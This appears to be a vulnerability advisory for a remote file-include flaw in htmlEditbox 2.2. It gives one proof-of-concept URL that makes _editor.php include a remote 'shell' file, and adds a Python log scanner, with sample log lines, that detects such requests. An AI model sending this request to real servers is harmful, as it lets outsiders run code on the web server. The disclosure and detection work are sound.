Vendor: htmlEditbox
By: Unknown
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: Unknown
Product Name: htmlEditbox
Affected Version From: 2.2
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Platforms Tested: Unknown

htmlEditbox Remote File Include Vulnerability

htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit this vulnerability to execute malicious PHP code in the context of the webserver. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation: Unknown

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23664/info

htmlEditbox 2.2 is vulnerable to this issue; other versions may also be affected. 

http://www.example.com/_editor.php?settings[app_dir]=http://shell
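
A log check for the request pattern above, as an added example that is not part of the original advisory: it flags requests to `_editor.php` whose `settings[app_dir]` parameter carries a URL-like value instead of a local path. The combined-log-format input, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/May/2007:10:00:00 +0000] "GET /_editor.php?settings[app_dir]=http://shell HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/May/2007:10:00:05 +0000] "GET /_editor.php?settings%5Bapp_dir%5D=hTTp%3A%2F%2Fhost.example%2Fx HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/May/2007:10:00:09 +0000] "GET /_editor.php?id=7 HTTP/1.1" 200 2048',
    '192.0.2.13 - - [01/May/2007:10:00:12 +0000] "GET /_editor.php?settings[app_dir]=/var/www/editor HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A scheme prefix of two or more characters (http:, ftp:, php:, data: ...) or a
# protocol-relative //host value. Single letters are excluded so that Windows
# drive paths such as C:\ are not reported.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//)', re.IGNORECASE)


def rfi_attempt(line, script="_editor.php", param="settings[app_dir]"):
    """Return the decoded parameter value if the line is a request to `script`
    whose `param` holds a URL-like value, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    if not unquote(path).lower().endswith("/" + script):
        return None
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl removes one layer of percent-encoding; unquote() removes a second.
        value = unquote(value)
        if unquote(key).lower() == param and REMOTE_VALUE_RE.match(value):
            return value
    return None


def scan(lines):
    """Return (client address, offending value) for every flagged line."""
    return [(line.split()[0], hit) for line in lines if (hit := rfi_attempt(line))]


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"possible remote file include from {client}: {value}")
```

Only the query string is inspected, so a value submitted in a POST body would need the same check applied at the application or WAF layer.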